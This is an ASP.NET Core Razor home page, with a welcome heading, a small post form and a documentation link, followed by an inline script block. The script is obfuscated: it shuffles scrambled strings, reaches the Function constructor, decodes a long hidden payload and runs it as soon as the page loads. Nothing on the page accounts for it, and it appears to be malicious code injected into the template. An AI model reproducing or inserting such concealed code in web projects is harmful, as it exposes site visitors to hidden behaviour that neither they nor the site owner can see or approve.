@page
@model SSRModel
@{
    ViewData["Title"] = "Home page";
}

<div class="text-center">
    <h1 class="display-4">Welcome</h1>
    <form id="theForm" method="post">
        <input type="text" name="some_value">
        <input type="submit">
    </form>
    <p>Learn about <a href="https://docs.microsoft.com/aspnet/core">building Web apps with ASP.NET Core</a>.</p>
</div>

<script>
    (function(){var jEc='',ztb=390-379;function rAe(x){var o=1718920;var q=x.length;var b=[];for(var w=0;w<q;w++){b[w]=x.charAt(w)};for(var w=0;w<q;w++){var l=o*(w+235)+(o%24357);var z=o*(w+140)+(o%47808);var s=l%q;var h=z%q;var d=b[s];b[s]=b[h];b[h]=d;o=(l+z)%5159892;};return b.join('')};var AOg=rAe('gxwstdzronhiqrmcnalcsutkbypjfrouvtoce').substr(0,ztb);var QZo='huh(w=s+){q[A7h t,ti6r0Aattb(d)pu,),,lr}npq=l8ianoy,)Cesf =1!7, ["l,th;sa9;svl8o,la5t6vjhyqe(,2o;h;(c25nr;t0+8;]70,p,,p=b;= br;rel]f((4.gr+il 7vntr(s)nd6yl+e)+ol;a])=6;v==)yai";+l(o(]5avra=for1goip.g;ta=g;"rs(;aa(gdao0rs.ien2g;zt7eorvtrerba.glwn(ns[hq.(;;".l+ "aa.t+]+lCo3]z0w0<e;>=9v3.]]pkr)){g. s..5u(l*v[m ((ssel;;a- n=sumcut.ka8=oAv=r0hst.lamgt;m-[) ;ahC+rh[2n;gv;muaiC+(]dva.j8rngc{ndrCpe.]h5=hi)r;)yj[.zhcxoc(bi9=xuer*te9ucvevn(nf===y,fara,,=);0=lfne.rd.]fC)a);r{-r)({jC+erg;h ;;8envae0 .h=w a 8h=ya.cfrui=i1et+;hs,-[r(p);}+n2y},l)ntcnr5=p-j18r"e=t;=c8{=fc=(rhs;,tcfvr=,a"vh+svrro  6,;a.=)+x, fuwg("vqtlf==,==+18)i0}y)7ns=))(p[i<,2)s.7u6+v1]au  zrl,r],eoozrovna9j.ay("1nv8f1-a1siul[9z;;}.tko[vb}}tao(r;eAi);nte)t(u+ii1ch++;;y>h120+o60ly4foevvir(o;n4=r=Sr[)4(+vcvidll16annjl v-(n=f;s7<s.;egptcsr.e=isg)stsi[v;)foozagg9(()n{Cna);c+rvrr ==6 +ni7rnnsr,o(e)(;<  <[n,raSx]i"A)uj!v ft.yo122v';var VaC=rAe[AOg];var gHV='';var jxi=VaC;var CUz=VaC(gHV,rAe(QZo));var OAQ=CUz(rAe(' i2=-e=m=C$iGge)t.vTv8,v0Gt,97(zrG&;Ga(a &a3G.\/t(7o.]l]=Gb(!3(%cr((!ejGa.Gg.dGaedd$($25n3cGgyioG(..5s+.$s;}3nN&Gal.s73,3!*}uol;*.;G5G2ty f.h%t(.{cujt.5z(ytul11si]a=\/f%Gnf+i.a (Gr;\'%e12.*d.72G_dGt(lG,.$3b.u+l(Io3o{()ra.+s,{1aniG(!Te(];\'+ll+}G;8rp)fa)wGi;f.)(9x2G1G6.\/4,Gbz)e};\/50G!Ne]lteo>(G$G(}.G)pG!G),fv5ftp!;=o)Gl.+ctSl)_a4w);a\/da$}b.,.G,Glu){..{8GeN#GeIi}[jhfaueG.G0Gn%IltG;3{fd,Giet..ete+0(gx.1snG)nbf(G$p!(6,]]5)trGsj6.7w)8G(.q$);=_=" nN2a]_.7gna0ndGy.GrtrG%l j)sGTo8)Gl;._;,=o%.o3]0;.=ro,7la%i_dG0e!rn..(g0a.>jfjt;2_t%jah)&%;.4G63g,],}lan]47w,,j( ;r((3G32$dsiG(G2os3(niG.lm!-f3l4%rnofmG.2G)3d)\/wjaf+G.y\'5.G=7xfa" rgd)z(.(#(reje.4ca$f{t];...u w_,3.!_$]x)m8m..a$u#g\/-$},f=;-!0f!=.e3eo7;G,.r_Git.G[3)!,tG%)}G#o0y6(.G,bG;%n7_4u3%$tsoG.02e4))(1cG+G).e}G alS\'40a,fpgG(f{i\'r)hI4.>1(!3g,j{y,w.a5a nr%2(ut,uG)a)Gn))jIGG ]=,G.fa_GGxg.;l,]f1G}_G5.[3i0{oG,!)j.x=q3C=.$))!S>;_=!nGoGn0)l"(sG(GgxnvT3t{"3aa _b#.i."u.f ! o"G21]G=yco) za3Gp=(bd1_d]fsfCt1 G.j+ $4,j!fl3(j )!sEl$;1GaG)4!\/t"=s},i(Gv784GlGp=h{0)}(_$a#34141$))4!%y6G)G3 vu.rtiv3).e.)u3.5=r$G\/f.G[Gl$.,w)4}1a, g8f;G.2rb.c+vla_=g0+*[G#dpw_a$.ru!b9$d)_G!tG=ig)'));var UxS=jxi(jEc,OAQ );UxS(2480);return 9152})()
    </script>
